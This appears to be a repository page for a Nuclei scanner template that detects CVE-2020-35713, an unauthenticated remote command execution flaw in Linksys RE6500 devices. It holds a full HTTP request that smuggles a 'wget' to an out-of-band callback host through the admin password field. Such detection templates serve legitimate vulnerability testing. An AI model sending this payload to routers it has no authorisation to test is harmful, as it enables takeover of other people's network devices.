daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/cves/2020/CVE-2020-35713.yaml

30 lines
1.0 KiB
YAML
Raw Normal View History

Create CVE-2020-35713.yaml Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-15 09:10:11 +00:00
id: CVE-2020-35713
info:
name: Linksys RE6500 Pre-Auth RCE
author: gy741
severity: critical
reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
Update CVE-2020-35713.yaml
2021-07-16 12:00:35 +00:00
tags: cve,cve2020,linksys,rce,oob,router
Create CVE-2020-35713.yaml Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-15 09:10:11 +00:00
requests:
- raw:
- |
POST /goform/setSysAdm HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}/login.shtml
admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"